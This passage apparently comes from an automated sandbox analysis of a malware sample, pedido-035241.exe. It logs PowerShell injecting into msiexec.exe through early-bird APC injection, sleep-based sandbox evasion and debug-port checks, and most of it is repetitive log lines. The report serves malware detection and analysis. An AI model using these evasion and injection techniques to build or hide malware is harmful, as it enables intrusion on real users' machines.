            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595077Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7152Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2581Jump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1608Thread sleep count: 1890 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1608Thread sleep count: 7968 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599452s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597702s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596827s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596499s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -595077s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597702Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596827Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595077Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
            Source: msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f520a1e05ec<
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024564000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f7597775302<
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.000000000891D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\pedido-035241.exeAPI call chain: ExitProcess graph end nodegraph_0-3802
            Source: C:\Users\user\Desktop\pedido-035241.exeAPI call chain: ExitProcess graph end nodegraph_0-3806
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BED278 LdrInitializeThunk,6_2_02BED278
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
